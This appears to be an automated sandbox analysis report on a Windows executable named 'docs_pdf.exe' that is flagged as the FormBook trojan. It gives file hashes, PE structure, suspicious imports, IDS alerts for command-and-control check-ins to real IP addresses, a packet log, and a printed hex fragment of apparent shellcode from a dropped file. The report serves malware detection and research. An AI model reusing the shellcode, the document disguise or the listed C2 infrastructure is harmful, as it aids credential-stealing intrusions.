                                  Size (bytes):9856
                                  Entropy (8bit):7.5981303542491725
                                  Encrypted:false
                                  SSDEEP:192:ZyaFcKdCicbZ/vL8eXcmP7m/LW+sxsddxDIjW678yfsRpO/2ZnEBVw8:3F7AicbZ/vLXXZKTNsGDIK6VfsnOuZED
                                  MD5:DFFC837B10948578C409D85C20AF7A1A
                                  SHA1:435D3D5E605EC638259DD0A6AF66904FB4364569
                                  SHA-256:DD5B71209E361E5C8CB0939ECB0F415E973953EF277C26881B4FF718D532B2F6
                                  SHA-512:A58929E3195A8C0991C3071AB990386AEEC0715B3B8CCC6AFF1C0F7951923B9364589FD40DCC33A1E19AC1F5C08A53DF740297F55E17DF61AF647EBA01D037EA
                                  Malicious:false
                                  Reputation:low
                                  Preview:EA06..pT..f.Y..4.Lf.9..D.P..I..3..h3j..s9..g3...g3..4:..E..&.i..8......D.Ph3...aB.Q..j5.q4.Pf....qb.....-..c.L...$.m5...k..c0.M....k8.X.3i...l..%.o2....A8.6,.........3k....e.N&s0.oNf.)...k.K$.eb....5..f.........6.0.o.p....l39....V0...S..$.if...6....f.I...@.....i8........X@.4.1..........$.P...0z.5..$}3Y.....=5..`d....!d..V...7f.[$..8...|.I..W.d...|vI..W.d...|vK..W.d...|vK(.W.e...|vY..W,.O...k.`..X@..9..^.8..F.6.z..G......`......i..G../Z...zqd...l.;.........|......7...}3{(........;^..l =..p.........3p.o....,.......x.....H<.lX.:...b.....,. ...2...f.[...K.)....b..i|v F......X......`....,.9....5...._..l......>K.....ir.e....[4..d..f.y.....,.....S >..p...........s9.... !..Y....f...ja4....ea.h,.p.....,.a8.,..3........f.....f ....,j.0..&...J......f ....6K%.ke..f....L..;2.X...4.Y.V@.Fn.....f@....l..05.....!;3.X...c )D.g6... ...'&`....,f.6..&....r...Brh.....l...i2...B....@.......d.L.`!.....P...@X5d..lSK...9...!;5.X...cVY......'.B...,vl.!..>.a..l...M..@...X...b.M&

                                  C:\Users\user\AppData\Local\Temp\pluffer

                                  Download File
                                  Process:C:\Users\user\Desktop\docs_pdf.exe
                                  File Type:ASCII text, with very long lines (28756), with no line terminators
                                  Category:dropped
                                  Size (bytes):28756
                                  Entropy (8bit):3.5934503475136346
                                  Encrypted:false
                                  SSDEEP:768:4iTZ+2QoioGRk6ZklputwjpjBkCiw2RuJ3nXKUrvzjsNbA+IL26cz24vfF3if6g2:4iTZ+2QoioGRk6ZklputwjpjBkCiw2Rf
                                  MD5:AEA3A63E777AB70DEF65DEB0959F608A
                                  SHA1:1705D8F3043D187D3270C494D4DC6DC1813C7E59
                                  SHA-256:A6A484D92273CD78434641E78D248D2502DDFF5850355A1CF8777EE240AF381F
                                  SHA-512:9DF1E1A42B95CC6F2B27CC0E66ED74D1B8A8CE23A959F925454990CD7CD0DF2D04D7A75A66625CD1CFCDF195B67FC9CFFB28E575909DFA7C1A374587F7A2ED61
                                  Malicious:false
                                  Reputation:low
                                  Preview:1A6E71D4810309FDFC6D43D3E9A6A999A1918E3376ACA2EEC40F44C89B681ADD6AA0260BDF66FE84DA0x558bec81eccc0200005657b86b00000066894584b96500000066894d86ba7200000066895588b86e0000006689458ab96500000066894d8cba6c0000006689558eb83300000066894590b93200000066894d92ba2e00000066895594b86400000066894596b96c00000066894d98ba6c0000006689559a33c06689459cb96e00000066898d44ffffffba7400000066899546ffffffb86400000066898548ffffffb96c00000066898d4affffffba6c0000006689954cffffffb82e0000006689854effffffb96400000066898d50ffffffba6c00000066899552ffffffb86c00000066898554ffffff33c966898d56ffffffba75000000668955d0b873000000668945d2b96500000066894dd4ba72000000668955d6b833000000668945d8b93200000066894ddaba2e000000668955dcb864000000668945deb96c00000066894de0ba6c000000668955e233c0668945e4b96100000066898d68ffffffba640000006689956affffffb8760000006689856cffffffb96100000066898d6effffffba7000000066899570ffffffb86900000066898572ffffffb93300000066898d74ffffffba3200000066899576ffffffb82e00000066898578ffffffb96400000066898d7affffff

                                  Static File Info

                                  General

                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Entropy (8bit):7.145231431817893
                                  TrID:
                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                  • DOS Executable Generic (2002/1) 0.02%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:docs_pdf.exe
                                  File size:1'190'400 bytes
                                  MD5:942c50b985dc1e6eb49c1763d39d398f
                                  SHA1:9de6943387aef034ae9d2eab93f4ef557aba7ad2
                                  SHA256:455f3956ac0f7082228d48ed98ff0ea1d6f2cef1c01f6dc263502696e6a9a5b7
                                  SHA512:d25730885f8b18491500832af72a66ca14be9f23c5d8039a4f26a3b6ff9353bfa7e4689675b5fdb0410781881f5a418e881f9888508e1458b32e3b03d2425dd2
                                  SSDEEP:24576:uAHnh+eWsN3skA4RV1Hom2KXMmHazbg6J7wZ48VXAEiK5:Zh+ZkldoPK8YazbgrZ48VwEL
                                  TLSH:C945AE0273D2D036FFAB92739B6AF60156BC79254133852F13981DB9BD701B2263E663
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..

                                  File Icon

                                  Icon Hash:aaf3e3e3938382a0

                                  Static PE Info

                                  General

                                  Entrypoint:0x42800a
                                  Entrypoint Section:.text
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                  Time Stamp:0x668F150E [Wed Jul 10 23:11:10 2024 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:5
                                  OS Version Minor:1
                                  File Version Major:5
                                  File Version Minor:1
                                  Subsystem Version Major:5
                                  Subsystem Version Minor:1
                                  Import Hash:afcdf79be1557326c854b6e20cb900a7

                                  Entrypoint Preview

                                  Instruction
                                  call 00007F737D3426EDh
                                  jmp 00007F737D3354A4h
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  push edi
                                  push esi
                                  mov esi, dword ptr [esp+10h]
                                  mov ecx, dword ptr [esp+14h]
                                  mov edi, dword ptr [esp+0Ch]
                                  mov eax, ecx
                                  mov edx, ecx
                                  add eax, esi
                                  cmp edi, esi
                                  jbe 00007F737D33562Ah
                                  cmp edi, eax
                                  jc 00007F737D33598Eh
                                  bt dword ptr [004C41FCh], 01h
                                  jnc 00007F737D335629h
                                  rep movsb
                                  jmp 00007F737D33593Ch
                                  cmp ecx, 00000080h
                                  jc 00007F737D3357F4h
                                  mov eax, edi
                                  xor eax, esi
                                  test eax, 0000000Fh
                                  jne 00007F737D335630h
                                  bt dword ptr [004BF324h], 01h
                                  jc 00007F737D335B00h
                                  bt dword ptr [004C41FCh], 00000000h
                                  jnc 00007F737D3357CDh
                                  test edi, 00000003h
                                  jne 00007F737D3357DEh
                                  test esi, 00000003h
                                  jne 00007F737D3357BDh
                                  bt edi, 02h
                                  jnc 00007F737D33562Fh
                                  mov eax, dword ptr [esi]
                                  sub ecx, 04h
                                  lea esi, dword ptr [esi+04h]
                                  mov dword ptr [edi], eax
                                  lea edi, dword ptr [edi+04h]
                                  bt edi, 03h
                                  jnc 00007F737D335633h
                                  movq xmm1, qword ptr [esi]
                                  sub ecx, 08h
                                  lea esi, dword ptr [esi+08h]
                                  movq qword ptr [edi], xmm1
                                  lea edi, dword ptr [edi+08h]
                                  test esi, 00000007h
                                  je 00007F737D335685h
                                  bt esi, 03h

                                  Rich Headers

                                  Programming Language:
                                  • [ASM] VS2013 build 21005
                                  • [ C ] VS2013 build 21005
                                  • [C++] VS2013 build 21005
                                  • [ C ] VS2008 SP1 build 30729
                                  • [IMP] VS2008 SP1 build 30729
                                  • [ASM] VS2013 UPD5 build 40629
                                  • [RES] VS2013 build 21005
                                  • [LNK] VS2013 UPD5 build 40629

                                  Data Directories

                                  NameVirtual AddressVirtual Size Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xbc0cc0x17c.rdata
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xc80000x5830c.rsrc
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x1210000x7134.reloc
                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa4b500x40.rdata
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                  Sections

                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                  .text0x10000x8dfdd0x8e000310e36668512d53489c005622bb1b4a9False0.5735602580325704data6.675248351711057IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  .rdata0x8f0000x2fd8e0x2fe00748cf1ab2605ce1fd72d53d912abb68fFalse0.32828818537859006data5.763244005758284IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .data0xbf0000x8f740x5200aae9601d920f07080bdfadf43dfeff12False0.1017530487804878data1.1963819235530628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .rsrc0xc80000x5830c0x58400c9b291c10ff6b4fef017670cc607ee11False0.9275047583215298data7.895439728782804IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .reloc0x1210000x71340x7200f04128ad0f87f42830e4a6cdbc38c719False0.7617530153508771data6.783955557128661IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                  Resources

                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                  RT_ICON0xc84a00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                  RT_ICON0xc85c80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                  RT_ICON0xc88b00x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                  RT_ICON0xc89d80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                  RT_ICON0xc98800x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                  RT_ICON0xca1280x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                  RT_ICON0xca6900x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                  RT_ICON0xccc380x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                  RT_ICON0xcdce00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                  RT_STRING0xce1480x594dataEnglishGreat Britain0.3333333333333333
                                  RT_STRING0xce6dc0x68adataEnglishGreat Britain0.2747909199522103
                                  RT_STRING0xced680x490dataEnglishGreat Britain0.3715753424657534
                                  RT_STRING0xcf1f80x5fcdataEnglishGreat Britain0.3087467362924282
                                  RT_STRING0xcf7f40x65cdataEnglishGreat Britain0.34336609336609336
                                  RT_STRING0xcfe500x466dataEnglishGreat Britain0.3605683836589698
                                  RT_STRING0xd02b80x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                  RT_RCDATA0xd04100x4f9a4data1.0003251015175494
                                  RT_GROUP_ICON0x11fdb40x76dataEnglishGreat Britain0.6610169491525424
                                  RT_GROUP_ICON0x11fe2c0x14dataEnglishGreat Britain1.15
                                  RT_VERSION0x11fe400xdcdataEnglishGreat Britain0.6181818181818182
                                  RT_MANIFEST0x11ff1c0x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                  Imports

                                  DLLImport
                                  WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                  VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                  WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                  COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                  MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                  WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                  PSAPI.DLLGetProcessMemoryInfo
                                  IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                  USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                  UxTheme.dllIsThemeActive
                                  KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                  USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                  GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                  COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                  ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                  SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                  ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                  OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

                                  Possible Origin

                                  Language of compilation systemCountry where language is spokenMap
                                  EnglishGreat Britain

                                  Network Behavior

                                  Snort IDS Alerts

                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                  07/13/24-00:07:48.656337TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34973880192.168.2.4217.160.0.106
                                  07/13/24-00:08:53.091829TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34975080192.168.2.4194.9.94.85
                                  07/13/24-00:08:18.355432TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34974380192.168.2.4208.91.197.27
                                  07/13/24-00:08:39.497873TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34974680192.168.2.443.252.167.188
                                  07/13/24-00:09:06.939506TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34975480192.168.2.423.251.54.212
                                  07/13/24-00:07:46.120127TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34973780192.168.2.4217.160.0.106
                                  07/13/24-00:08:55.622362TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34975180192.168.2.4194.9.94.85
                                  07/13/24-00:08:15.823053TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34974280192.168.2.4208.91.197.27
                                  07/13/24-00:09:09.468816TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34975580192.168.2.423.251.54.212
                                  07/13/24-00:08:42.029982TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34974780192.168.2.443.252.167.188

                                  Network Port Distribution

                                  TCP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Jul 13, 2024 00:07:30.359757900 CEST4973680192.168.2.45.44.111.162
                                  Jul 13, 2024 00:07:30.367351055 CEST80497365.44.111.162192.168.2.4
                                  Jul 13, 2024 00:07:30.367444992 CEST4973680192.168.2.45.44.111.162
                                  Jul 13, 2024 00:07:30.369421959 CEST4973680192.168.2.45.44.111.162
                                  Jul 13, 2024 00:07:30.377805948 CEST80497365.44.111.162192.168.2.4
                                  Jul 13, 2024 00:07:31.044356108 CEST80497365.44.111.162192.168.2.4
                                  Jul 13, 2024 00:07:31.044428110 CEST80497365.44.111.162192.168.2.4
                                  Jul 13, 2024 00:07:31.044595957 CEST4973680192.168.2.45.44.111.162
                                  Jul 13, 2024 00:07:31.047086954 CEST4973680192.168.2.45.44.111.162
                                  Jul 13, 2024 00:07:31.054765940 CEST80497365.44.111.162192.168.2.4
                                  Jul 13, 2024 00:07:46.111649036 CEST4973780192.168.2.4217.160.0.106
                                  Jul 13, 2024 00:07:46.118453979 CEST8049737217.160.0.106192.168.2.4
                                  Jul 13, 2024 00:07:46.118557930 CEST4973780192.168.2.4217.160.0.106
                                  Jul 13, 2024 00:07:46.120126963 CEST4973780192.168.2.4217.160.0.106
                                  Jul 13, 2024 00:07:46.127224922 CEST8049737217.160.0.106192.168.2.4
                                  Jul 13, 2024 00:07:46.762787104 CEST8049737217.160.0.106192.168.2.4
                                  Jul 13, 2024 00:07:46.762901068 CEST8049737217.160.0.106192.168.2.4
                                  Jul 13, 2024 00:07:46.762978077 CEST4973780192.168.2.4217.160.0.106
                                  Jul 13, 2024 00:07:47.627954006 CEST4973780192.168.2.4217.160.0.106
                                  Jul 13, 2024 00:07:48.645911932 CEST4973880192.168.2.4217.160.0.106
                                  Jul 13, 2024 00:07:48.651062965 CEST8049738217.160.0.106192.168.2.4
                                  Jul 13, 2024 00:07:48.651182890 CEST4973880192.168.2.4217.160.0.106
                                  Jul 13, 2024 00:07:48.656337023 CEST4973880192.168.2.4217.160.0.106
                                  Jul 13, 2024 00:07:48.661279917 CEST8049738217.160.0.106192.168.2.4
                                  Jul 13, 2024 00:07:49.323837996 CEST8049738217.160.0.106192.168.2.4
                                  Jul 13, 2024 00:07:49.323935032 CEST8049738217.160.0.106192.168.2.4
                                  Jul 13, 2024 00:07:49.323990107 CEST4973880192.168.2.4217.160.0.106
                                  Jul 13, 2024 00:07:50.159162045 CEST4973880192.168.2.4217.160.0.106
                                  Jul 13, 2024 00:07:51.177151918 CEST4973980192.168.2.4217.160.0.106
                                  Jul 13, 2024 00:07:51.183880091 CEST8049739217.160.0.106192.168.2.4
                                  Jul 13, 2024 00:07:51.183975935 CEST4973980192.168.2.4217.160.0.106
                                  Jul 13, 2024 00:07:51.185796022 CEST4973980192.168.2.4217.160.0.106
                                  Jul 13, 2024 00:07:51.191941977 CEST8049739217.160.0.106192.168.2.4
                                  Jul 13, 2024 00:07:51.192007065 CEST8049739217.160.0.106192.168.2.4
                                  Jul 13, 2024 00:07:51.192020893 CEST8049739217.160.0.106192.168.2.4
                                  Jul 13, 2024 00:07:51.192049026 CEST8049739217.160.0.106192.168.2.4
                                  Jul 13, 2024 00:07:51.192063093 CEST8049739217.160.0.106192.168.2.4
                                  Jul 13, 2024 00:07:51.194511890 CEST8049739217.160.0.106192.168.2.4
                                  Jul 13, 2024 00:07:51.194577932 CEST8049739217.160.0.106192.168.2.4
                                  Jul 13, 2024 00:07:51.194592953 CEST8049739217.160.0.106192.168.2.4
                                  Jul 13, 2024 00:07:51.194605112 CEST8049739217.160.0.106192.168.2.4
                                  Jul 13, 2024 00:07:51.868599892 CEST8049739217.160.0.106192.168.2.4
                                  Jul 13, 2024 00:07:51.868613005 CEST8049739217.160.0.106192.168.2.4
                                  Jul 13, 2024 00:07:51.868884087 CEST4973980192.168.2.4217.160.0.106
                                  Jul 13, 2024 00:07:52.690669060 CEST4973980192.168.2.4217.160.0.106
                                  Jul 13, 2024 00:07:53.714004993 CEST4974080192.168.2.4217.160.0.106
                                  Jul 13, 2024 00:07:53.720654964 CEST8049740217.160.0.106192.168.2.4
                                  Jul 13, 2024 00:07:53.720774889 CEST4974080192.168.2.4217.160.0.106
                                  Jul 13, 2024 00:07:53.722448111 CEST4974080192.168.2.4217.160.0.106
                                  Jul 13, 2024 00:07:53.728666067 CEST8049740217.160.0.106192.168.2.4
                                  Jul 13, 2024 00:07:54.387881041 CEST8049740217.160.0.106192.168.2.4
                                  Jul 13, 2024 00:07:54.388294935 CEST8049740217.160.0.106192.168.2.4
                                  Jul 13, 2024 00:07:54.388381004 CEST4974080192.168.2.4217.160.0.106
                                  Jul 13, 2024 00:07:54.390310049 CEST4974080192.168.2.4217.160.0.106
                                  Jul 13, 2024 00:07:54.395184040 CEST8049740217.160.0.106192.168.2.4
                                  Jul 13, 2024 00:08:15.814943075 CEST4974280192.168.2.4208.91.197.27
                                  Jul 13, 2024 00:08:15.820538044 CEST8049742208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:15.820667982 CEST4974280192.168.2.4208.91.197.27
                                  Jul 13, 2024 00:08:15.823052883 CEST4974280192.168.2.4208.91.197.27
                                  Jul 13, 2024 00:08:15.828536034 CEST8049742208.91.197.27192.168.2.4
